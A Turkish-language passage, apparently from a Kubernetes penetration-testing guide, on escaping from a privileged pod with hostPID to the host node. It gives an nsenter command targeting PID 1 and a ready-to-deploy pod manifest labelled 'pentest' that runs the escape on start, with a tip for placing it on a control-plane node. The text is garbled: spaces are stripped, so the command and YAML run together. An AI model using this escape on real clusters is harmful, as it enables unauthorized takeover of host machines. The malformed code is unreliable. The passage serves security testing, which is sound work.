Bu yetkilerle, ana bilgisayarın işlemlerine erişebilirsiniz ve ana bilgisayarın işlemlerinden birinin ad alanına girmek için yeterli yetkilere sahip olursunuz.
Unutmayın, ayrıcalıklı olmak yerine bazı yeteneklere ve diğer potansiyel savunma mekanizmalarının atlatılmasına (örneğin apparmor ve/veya seccomp) ihtiyacınız olabilir.
Aşağıdaki gibi bir şeyi yürütmek, pod'dan kaçmanıza izin verecektir:
nsenter--target1--mount--uts--ipc--net--pid--bash
Yapılandırma örneği:
apiVersion:v1kind:Podmetadata:name:priv-and-hostpid-exec-podlabels:app:pentestspec:hostPID:truecontainers:- name:priv-and-hostpid-podimage:ubuntutty:truesecurityContext:privileged:truecommand: [ "nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash" ]#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name